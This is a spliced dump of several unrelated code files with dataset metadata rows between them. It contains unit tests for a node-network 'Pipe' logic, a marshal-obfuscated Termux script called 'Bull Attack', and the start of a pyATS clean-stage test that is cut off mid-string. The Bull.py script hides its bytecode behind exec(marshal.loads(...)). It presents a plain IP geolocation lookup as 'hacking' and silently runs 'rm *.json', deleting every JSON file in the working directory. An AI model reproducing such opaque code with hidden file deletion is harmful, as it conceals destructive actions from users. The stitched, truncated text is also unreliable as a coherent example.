n_c = netapi.create_node("Pipe", "Root", "C")
netapi.link_with_reciprocal(n_head, n_a, "subsur")
netapi.link_with_reciprocal(n_head, n_b, "subsur")
netapi.link_with_reciprocal(n_head, n_c, "subsur")
netapi.link(source, "gen", n_a, "sur", -1)
for i in range(1, 3):
net.step()
assert n_head.get_gate("gen").activation == - 1 / 3
netapi.link(source, "gen", n_c, "sur")
for i in range(1, 3):
net.step()
assert n_head.get_gate("gen").activation == 0
netapi.link(source, "gen", n_b, "sur")
for i in range(1, 3):
net.step()
assert n_head.get_gate("gen").activation == 1 / 3
def test_node_pipe_logic_two_script(fixed_nodenet):
# test whether scripts work
net, netapi, source = prepare(fixed_nodenet)
n_head = netapi.create_node("Pipe", "Root", "Head")
n_a = netapi.create_node("Pipe", "Root", "A")
n_b = netapi.create_node("Pipe", "Root", "B")
netapi.link_with_reciprocal(n_head, n_a, "subsur")
netapi.link_with_reciprocal(n_head, n_b, "subsur")
netapi.link_with_reciprocal(n_a, n_b, "porret")
netapi.link(source, "gen", n_head, "sub")
net.step()
net.step()
# quiet, first node requesting
assert n_head.get_gate("gen").activation == 0
assert n_a.get_gate("sub").activation == 1
assert n_a.get_gate("sur").activation == 0
assert n_b.get_gate("sub").activation == 0
assert n_b.get_gate("sur").activation == 0
# reply: good!
netapi.link(source, "gen", n_a, "sur")
net.step()
assert n_a.get_gate("sub").activation == 1
assert n_a.get_gate("sur").activation == 0
assert n_b.get_gate("sub").activation == 0
assert n_b.get_gate("sur").activation == 0
# second node now requesting
net.step()
assert n_a.get_gate("sub").activation == 1
assert n_a.get_gate("sur").activation == 0
assert n_b.get_gate("sub").activation == 1
assert n_b.get_gate("sur").activation == 0
# second node good, third requesting
netapi.link(source, "gen", n_b, "sur")
net.step()
net.step()
assert n_a.get_gate("sub").activation == 1
assert n_a.get_gate("sur").activation == 0
assert n_b.get_gate("sub").activation == 1
assert n_b.get_gate("sur").activation == 1
# overall script good
net.step()
assert n_head.get_gate("gen").activation == 1
def test_node_pipe_logic_three_script(fixed_nodenet):
# test whether scripts work
net, netapi, source = prepare(fixed_nodenet)
n_head = netapi.create_node("Pipe", "Root", "Head")
n_a = netapi.create_node("Pipe", "Root", "A")
n_b = netapi.create_node("Pipe", "Root", "B")
n_c = netapi.create_node("Pipe", "Root", "C")
netapi.link_with_reciprocal(n_head, n_a, "subsur")
netapi.link_with_reciprocal(n_head, n_b, "subsur")
netapi.link_with_reciprocal(n_head, n_c, "subsur")
netapi.link_with_reciprocal(n_a, n_b, "porret")
netapi.link_with_reciprocal(n_b, n_c, "porret")
netapi.link(source, "gen", n_head, "sub")
net.step()
net.step()
# quiet, first node requesting
assert n_head.get_gate("gen").activation == 0
assert n_a.get_gate("sub").activation == 1
assert n_a.get_gate("sur").activation == 0
assert n_b.get_gate("sub").activation == 0
assert n_b.get_gate("sur").activation == 0
assert n_c.get_gate("sub").activation == 0
assert n_c.get_gate("sur").activation == 0
# reply: good!
netapi.link(source, "gen", n_a, "sur")
net.step()
assert n_a.get_gate("sub").activation == 1
assert n_a.get_gate("sur").activation == 0
assert n_b.get_gate("sub").activation == 0
assert n_b.get_gate("sur").activation == 0
assert n_c.get_gate("sub").activation == 0
assert n_c.get_gate("sur").activation == 0
# second node now requesting
net.step()
assert n_a.get_gate("sub").activation == 1
assert n_a.get_gate("sur").activation == 0
assert n_b.get_gate("sub").activation == 1
assert n_b.get_gate("sur").activation == 0
assert n_c.get_gate("sub").activation == 0
assert n_c.get_gate("sur").activation == 0
# second node good, third requesting
netapi.link(source, "gen", n_b, "sur")
net.step()
net.step()
assert n_a.get_gate("sub").activation == 1
assert n_a.get_gate("sur").activation == 0
assert n_b.get_gate("sub").activation == 1
assert n_b.get_gate("sur").activation == 0
assert n_c.get_gate("sub").activation == 1
assert n_c.get_gate("sur").activation == 0
# third node good
netapi.link(source, "gen", n_c, "sur")
net.step()
net.step()
assert n_a.get_gate("sub").activation == 1
assert n_a.get_gate("sur").activation == 0
assert n_b.get_gate("sub").activation == 1
assert n_b.get_gate("sur").activation == 0
assert n_c.get_gate("sub").activation == 1
assert n_c.get_gate("sur").activation == 1
# overall script good
net.step()
assert n_head.get_gate("gen").activation == 1
# now let the second one fail
# whole script fails, third one muted
netapi.link(source, "gen", n_b, "sur", -1)
net.step()
net.step()
net.step() # extra steps because we're coming from a stable "all good state"
net.step()
assert n_a.get_gate("sub").activation == 1
assert n_a.get_gate("sur").activation == 0
assert n_b.get_gate("sub").activation == 1
assert n_b.get_gate("sur").activation == -1
assert n_c.get_gate("sub").activation == 0
assert n_c.get_gate("sur").activation == 0
net.step()
assert n_head.get_gate("gen").activation == -1
def test_node_pipe_logic_alternatives(fixed_nodenet):
# create a script with alternatives, let one fail, one one succeed
net, netapi, source = prepare(fixed_nodenet)
n_head = netapi.create_node("Pipe", "Root", "Head")
n_a = netapi.create_node("Pipe", "Root", "A")
n_b = netapi.create_node("Pipe", "Root", "B")
n_c = netapi.create_node("Pipe", "Root", "C")
n_b_a1 = netapi.create_node("Pipe", "Root", "B-A1")
n_b_a2 = netapi.create_node("Pipe", "Root", "B-A1")
netapi.link_with_reciprocal(n_head, n_a, "subsur")
netapi.link_with_reciprocal(n_head, n_b, "subsur")
netapi.link_with_reciprocal(n_head, n_c, "subsur")
netapi.link_with_reciprocal(n_b, n_b_a1, "subsur")
netapi.link_with_reciprocal(n_b, n_b_a2, "subsur")
netapi.link_with_reciprocal(n_a, n_b, "porret")
netapi.link_with_reciprocal(n_b, n_c, "porret")
netapi.link_with_reciprocal(n_b_a1, n_b_a2, "porret")
netapi.link(n_b_a1, "por", n_b_a2, "por", -1)
netapi.link(source, "gen", n_head, "sub")
net.step()
net.step()
# quiet, first node requesting
assert n_head.get_gate("gen").activation == 0
assert n_a.get_gate("sub").activation == 1
assert n_a.get_gate("sur").activation == 0
assert n_b.get_gate("sub").activation == 0
assert n_b.get_gate("sur").activation == 0
assert n_c.get_gate("sub").activation == 0
assert n_c.get_gate("sur").activation == 0
# reply: good!
netapi.link(source, "gen", n_a, "sur")
net.step()
assert n_a.get_gate("sub").activation == 1
assert n_a.get_gate("sur").activation == 0
assert n_b.get_gate("sub").activation == 0
assert n_b.get_gate("sur").activation == 0
assert n_c.get_gate("sub").activation == 0
assert n_c.get_gate("sur").activation == 0
# first alternative requesting
net.step()
net.step()
assert n_b_a1.get_gate("sub").activation == 1
assert n_b_a1.get_gate("sur").activation == 0
assert n_b_a2.get_gate("sub").activation == 0
assert n_b_a2.get_gate("sur").activation == 0
# reply: fail!
netapi.link(source, "gen", n_b_a1, "sur", -1)
net.step()
net.step()
assert n_b_a1.get_gate("sur").activation == 0
assert n_b_a1.get_gate("por").activation == -1
# second alternative requesting
assert n_b_a2.get_gate("sub").activation == 1
assert n_b_a2.get_gate("sur").activation == 0
assert n_b.get_gate("sur").activation == 0
# reply: succeed!
netapi.link(source, "gen", n_b_a2, "sur", 1)
net.step()
net.step()
assert n_b_a1.get_gate("sur").activation == 0
assert n_b_a1.get_gate("por").activation == -1
assert n_b_a2.get_gate("sub").activation == 1
assert n_b_a2.get_gate("sur").activation == 1
# third node good
netapi.link(source, "gen", n_c, "sur")
net.step()
net.step()
assert n_a.get_gate("sub").activation == 1
assert n_a.get_gate("sur").activation == 0
assert n_b.get_gate("sub").activation == 1
assert n_b.get_gate("sur").activation == 0
assert n_c.get_gate("sub").activation == 1
assert n_c.get_gate("sur").activation == 1
# overall script good
net.step()
assert n_head.get_gate("gen").activation == 1
# now let the second alternative also fail
# whole script fails, third one muted
netapi.link(source, "gen", n_b_a2, "sur", -1)
net.step()
net.step()
net.step() # extra steps because we're coming from a stable "all good state"
net.step()
assert n_a.get_gate("sub").activation == 1
assert n_a.get_gate("sur").activation == 0
assert n_b.get_gate("sub").activation == 1
assert n_b.get_gate("sur").activation == -1
assert n_c.get_gate("sub").activation == 0
assert n_c.get_gate("sur").activation == 0
net.step()
assert n_head.get_gate("gen").activation == -1
def test_node_pipe_logic_feature_binding(fixed_nodenet):
# check if the same feature can be checked and bound twice
net, netapi, source = prepare(fixed_nodenet)
schema = netapi.create_node("Pipe", "Root", "Schema")
element1 = netapi.create_node("Pipe", "Root", "Element1")
element2 = netapi.create_node("Pipe", "Root", "Element2")
netapi.link_with_reciprocal(schema, element1, "subsur")
netapi.link_with_reciprocal(schema, element2, "subsur")
concrete_feature1 = netapi.create_node("Pipe", "Root", "ConcreteFeature1")
concrete_feature2 = netapi.create_node("Pipe", "Root", "ConcreteFeature2")
netapi.link_with_reciprocal(element1, concrete_feature1, "subsur")
netapi.link_with_reciprocal(element2, concrete_feature2, "subsur")
abstract_feature = netapi.create_node("Pipe", "Root", "AbstractFeature")
netapi.link_with_reciprocal(concrete_feature1, abstract_feature, "catexp")
netapi.link_with_reciprocal(concrete_feature2, abstract_feature, "catexp")
netapi.link(source, "gen", schema, "sub")
netapi.link(source, "gen", abstract_feature, "sur")
net.step()
assert abstract_feature.get_gate("gen").activation == 1
assert abstract_feature.get_gate("exp").activation == 1
net.step()
assert concrete_feature1.get_gate("gen").activation == 1
assert concrete_feature2.get_gate("gen").activation == 1
net.step()
net.step()
assert schema.get_gate("gen").activation == 1
def test_node_pipe_logic_search_sub(fixed_nodenet):
# check if sub-searches work
net, netapi, source = prepare(fixed_nodenet)
n_a = netapi.create_node("Pipe", "Root", "A")
n_b = netapi.create_node("Pipe", "Root", "B")
netapi.link_with_reciprocal(n_a, n_b, "subsur")
sub_act, sur_act, por_act, ret_act, cat_act, exp_act = add_directional_activators(fixed_nodenet)
netapi.link(source, "gen", sub_act, "gen")
netapi.link(source, "gen", n_a, "sub")
net.step()
net.step()
net.step()
assert n_a.get_gate("sub").activation == 1
assert n_b.get_gate("sub").activation == 1
def test_node_pipe_logic_search_sur(fixed_nodenet):
# check if sur-searches work
net, netapi, source = prepare(fixed_nodenet)
n_a = netapi.create_node("Pipe", "Root", "A")
n_b = netapi.create_node("Pipe", "Root", "B")
netapi.link_with_reciprocal(n_a, n_b, "subsur")
sub_act, sur_act, por_act, ret_act, cat_act, exp_act = add_directional_activators(fixed_nodenet)
netapi.link(source, "gen", sur_act, "gen")
netapi.link(source, "gen", n_b, "sur")
net.step()
net.step()
net.step()
assert n_b.get_gate("sur").activation > 0
assert n_a.get_gate("sur").activation > 0
def test_node_pipe_logic_search_por(fixed_nodenet):
# check if por-searches work
net, netapi, source = prepare(fixed_nodenet)
n_a = netapi.create_node("Pipe", "Root", "A")
n_b = netapi.create_node("Pipe", "Root", "B")
netapi.link_with_reciprocal(n_a, n_b, "porret")
sub_act, sur_act, por_act, ret_act, cat_act, exp_act = add_directional_activators(fixed_nodenet)
netapi.link(source, "gen", por_act, "gen")
netapi.link(source, "gen", n_a, "por")
net.step()
net.step()
net.step()
assert n_a.get_gate("por").activation == 1
assert n_b.get_gate("por").activation == 1
def test_node_pipe_logic_search_ret(fixed_nodenet):
# check if ret-searches work
net, netapi, source = prepare(fixed_nodenet)
n_a = netapi.create_node("Pipe", "Root", "A")
n_b = netapi.create_node("Pipe", "Root", "B")
netapi.link_with_reciprocal(n_a, n_b, "porret")
sub_act, sur_act, por_act, ret_act, cat_act, exp_act = add_directional_activators(fixed_nodenet)
netapi.link(source, "gen", ret_act, "gen")
netapi.link(source, "gen", n_b, "ret")
net.step()
net.step()
net.step()
assert n_b.get_gate("ret").activation == 1
assert n_a.get_gate("ret").activation == 1
def test_node_pipe_logic_search_cat(fixed_nodenet):
# check if cat-searches work
net, netapi, source = prepare(fixed_nodenet)
n_a = netapi.create_node("Pipe", "Root", "A")
n_b = netapi.create_node("Pipe", "Root", "B")
netapi.link_with_reciprocal(n_a, n_b, "catexp")
sub_act, sur_act, por_act, ret_act, cat_act, exp_act = add_directional_activators(fixed_nodenet)
netapi.link(source, "gen", cat_act, "gen")
netapi.link(source, "gen", n_a, "cat")
net.step()
net.step()
net.step()
assert n_a.get_gate("cat").activation == 1
assert n_b.get_gate("cat").activation == 1
def test_node_pipe_logic_search_exp(fixed_nodenet):
# check if exp-searches work
net, netapi, source = prepare(fixed_nodenet)
n_a = netapi.create_node("Pipe", "Root", "A")
n_b = netapi.create_node("Pipe", "Root", "B")
netapi.link_with_reciprocal(n_a, n_b, "catexp")
sub_act, sur_act, por_act, ret_act, cat_act, exp_act = add_directional_activators(fixed_nodenet)
netapi.link(source, "gen", exp_act, "gen")
netapi.link(source, "gen", n_b, "exp")
net.step()
net.step()
net.step()
assert n_b.get_gate("exp").activation > 0
assert n_a.get_gate("exp").activation > 0
| 34.793162 | 100 | 0.665324 | 3,149 | 20,354 | 4.041918 | 0.046999 | 0.069846 | 0.075424 | 0.083281 | 0.892992 | 0.840116 | 0.803661 | 0.782605 | 0.755421 | 0.748822 | 0 | 0.012582 | 0.179965 | 20,354 | 584 | 101 | 34.85274 | 0.749985 | 0.071681 | 0 | 0.749398 | 0 | 0 | 0.089418 | 0 | 0 | 0 | 0 | 0 | 0.306024 | 1 | 0.045783 | false | 0 | 0.00241 | 0 | 0.053012 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d103b2b5a3ef51c33ebaff8114e5074f336c3f6f | 8,306 | py | Python | Termux-Android-Hackers-main/Bull.py | Zusyaku/Termux-And-Lali-Linux-V2 | b1a1b0841d22d4bf2cc7932b72716d55f070871e | [
"Apache-2.0"
] | 2 | 2021-11-17T03:35:03.000Z | 2021-12-08T06:00:31.000Z | Termux-Android-Hackers-main/Bull.py | Zusyaku/Termux-And-Lali-Linux-V2 | b1a1b0841d22d4bf2cc7932b72716d55f070871e | [
"Apache-2.0"
] | null | null | null | Termux-Android-Hackers-main/Bull.py | Zusyaku/Termux-And-Lali-Linux-V2 | b1a1b0841d22d4bf2cc7932b72716d55f070871e | [
"Apache-2.0"
] | 2 | 2021-11-05T18:07:48.000Z | 2022-02-24T21:25:07.000Z | import marshal
exec(marshal.loads('c\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\r\x03\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x01\x00l\x03\x00Z\x03\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x04\x00Z\x04\x00d\x00\x00d\x01\x00l\x05\x00Z\x05\x00d\x00\x00d\x01\x00l\x06\x00Z\x06\x00d\x00\x00d\x02\x00l\x03\x00m\x07\x00Z\x07\x00\x01e\x00\x00j\x08\x00d\x03\x00\x83\x01\x00\x01e\t\x00e\x01\x00\x83\x01\x00\x01e\x01\x00j\n\x00d\x04\x00\x83\x01\x00\x01d\x05\x00Z\x0b\x00d\x06\x00Z\x0c\x00d\x07\x00Z\r\x00d\x08\x00Z\x0e\x00d\t\x00Z\x0f\x00d\n\x00Z\x10\x00d\x0b\x00\x84\x00\x00Z\x11\x00e\x11\x00\x83\x00\x00\x01d\x0c\x00GHd\r\x00\x84\x00\x00Z\x12\x00e\x13\x00d\x0e\x00\x83\x01\x00Z\x14\x00e\x14\x00d\x0f\x00k\x02\x00r\x04\x01e\x12\x00\x83\x00\x00\x01n\x14\x00e\x14\x00d\x10\x00k\x02\x00r\x18\x01d\x11\x00GHn\x00\x00e\x13\x00d\x12\x00\x83\x01\x00Z\x15\x00d\x13\x00e\x15\x00\x16GHe\x15\x00j\x16\x00d\x14\x00\x83\x01\x00Z\x17\x00e\x15\x00dB\x00k\x06\x00r\x80\x01e\x05\x00j\x18\x00d\x17\x00d\x18\x00\x83\x02\x00\x01e\x19\x00d\x18\x00\x83\x01\x00Z\x1a\x00e\x04\x00j\x1b\x00e\x1a\x00\x83\x01\x00Z\x1c\x00e\x1c\x00d\x19\x00\x19Z\x15\x00n\x00\x00e\x05\x00j\x18\x00d\x1a\x00e\x15\x00\x16d\x18\x00\x83\x02\x00\x01e\x19\x00d\x18\x00\x83\x01\x00Z\x1a\x00e\x04\x00j\x1b\x00e\x1a\x00\x83\x01\x00Z\x1c\x00e\x1c\x00d\x1b\x00\x19d\x1c\x00k\x03\x00r\xce\x01d\x1d\x00GHe\x1d\x00\x83\x00\x00\x01n;\x00e\x14\x00d\x1e\x00k\x02\x00s\xf2\x01e\x14\x00d\x1f\x00k\x02\x00s\xf2\x01e\x14\x00d \x00k\x02\x00r\x04\x02d!\x00GHe\x01\x00j\x1d\x00\x83\x00\x00\x01n\x05\x00d"\x00GHx+\x00e\x1c\x00D]#\x00Z\x1e\x00e\x1c\x00e\x1e\x00\x19d#\x00k\x02\x00r\x10\x02d$\x00e\x1c\x00e\x1e\x00<q\x10\x02q\x10\x02Wd%\x00e\x1c\x00d&\x00\x19\x16GHd\'\x00e\x1c\x00d\x1b\x00\x19\x16GHd(\x00e\x1c\x00d)\x00\x19\x16GHd*\x00e\x1c\x00d+\x00\x19\x16GHd,\x00e\x1c\x00d-\x00\x19\x16GHd.\x00e\x1c\x00d/\x00\x19\x16GHd0\x00e\x1c\x00d1\x00\x19\x16GHd2\x00e\x1c\x00d3\x00\x19\x16GHd4\x00e\x1c\x00d5\x00\x19\x16GHd6\x00e\x1c\x00d7\x00\x19\x16GHd8\x00e\x1c\x00d9\x00\x19\x16GHd:\x00e\x1c\x00d;\x00\x19\x16GHd<\x00e\x1c\x00d=\x00\x19\x16GHd>\x00e\x1c\x00d?\x00\x19\x16GHd@\x00GHe\x00\x00j\x08\x00dA\x00\x83\x01\x00\x01e\x01\x00j\x1d\x00\x83\x00\x00\x01d\x01\x00S(C\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00sleept\x05\x00\x00\x00clears\x05\x00\x00\x00utf-8s\x04\x00\x00\x00\x1b[0ms\x05\x00\x00\x00\x1b[31ms\x05\x00\x00\x00\x1b[32ms\x05\x00\x00\x00\x1b[33ms\x04\x00\x00\x00\x1b[1ms\x04\x00\x00\x00\x1b[3mc\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00C\x00\x00\x00s\t\x00\x00\x00d\x01\x00GHd\x00\x00S(\x02\x00\x00\x00Nsj\x02\x00\x00\x1b[1m\n \x1b[33m______ _ _ ___ _ _ _ \n \x1b[33m| ___ \\ | | | / _ \\| | | | | | \n | |_/ /_ _| | | / /_\\ \\ |_| |_ __ _ ___| | __\n | ___ \\ | | | | | | _ | __| __/ _` |/ __| |/ /\n\x1b[32m | |_/ / |_| | | | | | | | |_| || (_| | (__| <\n \\____/ \\__,_|_|_| \\_| |_/\\__|\\__\\__,_|\\___|_|\\_\\\n\n\n\t \x1b[31m[_Location Catcher_]\n \n\x1b[0m\x1b[1m\n\t \x1b[33m[-] \x1b[0mPlatform : \x1b[33mAndroid Termux\n\t \x1b[1m\x1b[33m[-] \x1b[0mName : \x1b[33mBull Attack\n\t \x1b[1m\x1b[33m[-] \x1b[0mSite : \x1b[33mwww.bhai4you.net\n\t \x1b[1m\x1b[33m[-] \x1b[0mCoded by :\x1b[1m \x1b[33m[ \x1b[32mParixit \x1b[33m ]\n\t \x1b[1m\x1b[33m[-] \x1b[0mSec.Code : \x1b[33m8h4i\x1b[0m\n (\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<strng>t\x04\x00\x00\x00logo\x14\x00\x00\x00s\x02\x00\x00\x00\x00\x10s\xbe\x00\x00\x00\n\n\n\t\x1b[33m\x1b[1m <===[\x1b[32m:.Commands.:\x1b[33m]===>\x1b[0m\n \n\n1. B-Attack : Website or IP Location Hacker\n \n2. exit : Exit Bull Attack...\n\n\n\x1b[1m\x1b[32mtype : 1 or 2\n \x1b[0mc\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00C\x00\x00\x00s\t\x00\x00\x00d\x01\x00GHd\x00\x00S(\x02\x00\x00\x00Ns\x82\x00\x00\x00\n\n\n Commands :\n \n\n1. web : Website Location Hacker\n \n2. exit : Exit Bull Attack\n\n\n\n\n type : 1 or 2\n (\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<strng>t\x04\x00\x00\x00help/\x00\x00\x00s\x02\x00\x00\x00\x00\x07s$\x00\x00\x00\n\n[*] Bull Attack \x1b[1m\x1b[33m===>\x1b[0m R\x03\x00\x00\x00t\x01\x00\x00\x001s\x9a\x00\x00\x00\n\n\t\x1b[33m\x1b[1m <===[\x1b[32m:.Website or IP Hacker.:\x1b[33m]===>\x1b[0m\n\n\neg. Target\n\n\x1b[1m\x1b[33mWebsite\x1b[0m : www.bhai4you.net\n\n\x1b[1m\x1b[33mIp\x1b[0m : 74.125.130.121s%\x00\x00\x00\n\n[*] Website or IP \x1b[1m\x1b[33m===>\x1b[0ms\x19\x00\x00\x00\nHacking\x1b[1m\x1b[33m ===> %st\x01\x00\x00\x00.t\x04\x00\x00\x00selft\x06\x00\x00\x00myselfs!\x00\x00\x00https://api.ipify.org?format=jsons\t\x00\x00\x00data.jsont\x02\x00\x00\x00ips\x19\x00\x00\x00http://ip-api.com/json/%st\x06\x00\x00\x00statust\x07\x00\x00\x00successs!\x01\x00\x00\nHey Bro Sorry!!! -Please Enter Correct Details...\n\n\x1b[1m\x1b[33m [*] I Am Proud To Be An \x1b[1m\x1b[31mIn\x1b[1m\x1b[0mdi\x1b[1m\x1b[32man\x1b[33m [*]\n\n\t Advice For \x1b[1m\x1b[31mIn\x1b[1m\x1b[0mdi\x1b[1m\x1b[32man\x1b[1m\x1b[33m People \n\n\n\x1b[1m\x1b[32m[\x1b[33m==>\x1b[32m Mere Bhai True Website or IP Enter Kar...!!!\x1b[33m <===\x1b[32m]\x1b[0m\n\nt\x01\x00\x00\x002t\x02\x00\x00\x0002t\x04\x00\x00\x00exits8\x00\x00\x00\x1b[1m\x1b[31m\n\t\t[!] Exit Bull Attack... \n\n\t\x1b[1m\x1b[32m\x1b[0ms\'\x00\x00\x00\n\n\n\t[!] B-attack : \x1b[32mHacked!!!\x1b[0m\n\nt\x00\x00\x00\x00t\x07\x00\x00\x00Unknowns\x1b\x00\x00\x00\n *** .: %s :. ***\n\n\nt\x05\x00\x00\x00querys3\x00\x00\x00\nONLINE \x1b[32m\x1b[1m%s\x1b[0m s3\x00\x00\x00\nISP \x1b[1m\x1b[32m%s\x1b[0m t\x03\x00\x00\x00isps/\x00\x00\x00\nORG. NAME \x1b[32m\x1b[1m%s\x1b[0mt\x03\x00\x00\x00orgs3\x00\x00\x00\nCITY \x1b[32m\x1b[1m%s\x1b[0m t\x04\x00\x00\x00citys3\x00\x00\x00\nCITY TIMEZONE \x1b[32m\x1b[1m%s\x1b[0m t\x08\x00\x00\x00timezones/\x00\x00\x00\nREGION NAME \x1b[32m\x1b[1m%s\x1b[0mt\n\x00\x00\x00regionNames0\x00\x00\x00\nREGION CODE \x1b[32m\x1b[1m%s,\x1b[0mt\x06\x00\x00\x00regions0\x00\x00\x00\nCOUNTRY \x1b[32m\x1b[1m%s,\x1b[0mt\x07\x00\x00\x00countrys0\x00\x00\x00\nCOUNTRY CODE \x1b[32m\x1b[1m%s,\x1b[0mt\x0b\x00\x00\x00countryCodes/\x00\x00\x00\nZIP CODE \x1b[32m\x1b[1m%s\x1b[0mt\x03\x00\x00\x00zips/\x00\x00\x00\nLATITUDE \x1b[32m\x1b[1m%s\x1b[0mt\x03\x00\x00\x00lats/\x00\x00\x00\nLONGITUDE \x1b[32m\x1b[1m%s\x1b[0mt\x03\x00\x00\x00lons/\x00\x00\x00\nAS NUMBER/NAME \x1b[32m\x1b[1m%s\x1b[0mt\x02\x00\x00\x00asse\x00\x00\x00\n\n\n\n\x1b[1m\x1b[32m<=======[ \x1b[33m\x1b[1m\x1b[33m:.Author \x1b[1m\x1b[31m:\x1b[33m Sutariya Parixit.:\x1b[32m ]=======>\n\n\x1b[0ms\t\x00\x00\x00rm *.json(\x02\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00(\x1f\x00\x00\x00t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\n\x00\x00\x00subprocesst\x04\x00\x00\x00timet\x04\x00\x00\x00jsont\x06\x00\x00\x00urllibt\x02\x00\x00\x00reR\x00\x00\x00\x00t\x06\x00\x00\x00systemt\x06\x00\x00\x00reloadt\x12\x00\x00\x00setdefaultencodingt\x01\x00\x00\x00Wt\x01\x00\x00\x00Rt\x01\x00\x00\x00Gt\x01\x00\x00\x00Ot\x01\x00\x00\x00Bt\x02\x00\x00\x00RRR\x02\x00\x00\x00R\x03\x00\x00\x00t\t\x00\x00\x00raw_inputt\x04\x00\x00\x00bullt\x02\x00\x00\x00IPt\x05\x00\x00\x00splitt\x03\x00\x00\x00IP2t\x0b\x00\x00\x00urlretrievet\x04\x00\x00\x00opent\x04\x00\x00\x00filet\x04\x00\x00\x00loadt\x04\x00\x00\x00dataR\r\x00\x00\x00t\x01\x00\x00\x00k(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<strng>t\x08\x00\x00\x00<module>\x05\x00\x00\x00st\x00\x00\x000\x01<\x01\x10\x01\r\x01\n\x01\r\x03\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x02\t\x13\x07\x07\x05\x01\t\x0f\x0c\x01\x0c\x01\n\x02\x0c\x01\x08\x01\x0c\x01\t\x01\x0f\x01\x0c\x01\x10\x01\x0c\x01\x0f\x01\r\x01\x14\x01\x0c\x01\x0f\x01\x10\x01\x05\x01\n\x04$\x01\x05\x01\r\x03\x05\x02\r\x01\x10\x00\x11\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x03\x05\x01\r\x02')) | 4,153 | 8,291 | 0.685047 | 1,692 | 8,306 | 3.318558 | 0.156028 | 0.24577 | 0.155476 | 0.108994 | 0.425468 | 0.349599 | 0.324844 | 0.27943 | 0.242743 | 0.223687 | 0 | 0.333421 | 0.081026 | 8,306 | 2 | 8,291 | 4,153 | 0.402201 | 0 | 0 | 0 | 0 | 1 | 0.554713 | 0.502588 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 10 |
d13d1fd2db572224cde9888ed0c3ba2f4dab4155 | 8,663 | py | Python | pkgs/clean-pkg/src/genie/libs/clean/stages/tests/test_backup_file_on_device.py | patrickboertje/genielibs | 61c37aacf3dd0f499944555e4ff940f92f53dacb | [
"Apache-2.0"
] | 1 | 2022-01-16T10:00:24.000Z | 2022-01-16T10:00:24.000Z | pkgs/clean-pkg/src/genie/libs/clean/stages/tests/test_backup_file_on_device.py | patrickboertje/genielibs | 61c37aacf3dd0f499944555e4ff940f92f53dacb | [
"Apache-2.0"
] | null | null | null | pkgs/clean-pkg/src/genie/libs/clean/stages/tests/test_backup_file_on_device.py | patrickboertje/genielibs | 61c37aacf3dd0f499944555e4ff940f92f53dacb | [
"Apache-2.0"
] | null | null | null | import logging
import unittest
from unittest.mock import Mock
from genie.libs.clean.stages.stages import BackupFileOnDevice
from genie.libs.clean.stages.tests.utils import CommonStageTests, create_test_device
from pyats.aetest.steps import Steps
from pyats.results import Passed, Failed
from pyats.aetest.signals import TerminateStepSignal
# Disable logging. It may be useful to comment this out when developing tests.
logging.disable(logging.CRITICAL)
class VerifyEnoughAvailableDiskSpace(unittest.TestCase):
def setUp(self):
# Instantiate class object
self.cls = BackupFileOnDevice()
# Instantiate device object. This also sets up commonly needed
# attributes and Mock objects associated with the device.
self.device = create_test_device('PE1', os='iosxe')
def test_pass(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
copy_dir = "bootflash:/"
copy_file = "test.bin"
data = {'dir bootflash:/': '''
Directory of bootflash:/
11 drwx 16384 Nov 25 2016 19:32:53 -07:00 lost+found
12 -rw- 0 Dec 13 2016 11:36:36 -07:00 ds_stats.txt
104417 drwx 4096 Apr 10 2017 09:09:11 -07:00 .prst_sync
80321 drwx 4096 Nov 25 2016 19:40:38 -07:00 .rollback_timer
64257 drwx 4096 Nov 25 2016 19:41:02 -07:00 .installer
48193 drwx 4096 Nov 25 2016 19:41:14 -07:00 virtual-instance-stby-sync
8033 drwx 4096 Nov 25 2016 18:42:07 -07:00 test.bin
1940303872 bytes total (1036210176 bytes free)
'''
}
# And we want the execute method to be mocked with device console output.
self.device.execute = Mock(side_effect=lambda x: data[x])
# Call the method to be tested (clean step inside class)
self.cls.verify_enough_available_disk_space(
steps=steps, device=self.device, copy_dir=copy_dir, copy_file=copy_file
)
# Check that the result is expected
self.assertEqual(Passed, steps.details[0].result)
def test_fail_to_get_file_size(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
copy_dir = "bootflash:/"
copy_file = "test.bin"
data = {'dir bootflash:/': '''
Directory of bootflash:/
11 drwx 16384 Nov 25 2016 19:32:53 -07:00 lost+found
12 -rw- 0 Dec 13 2016 11:36:36 -07:00 ds_stats.txt
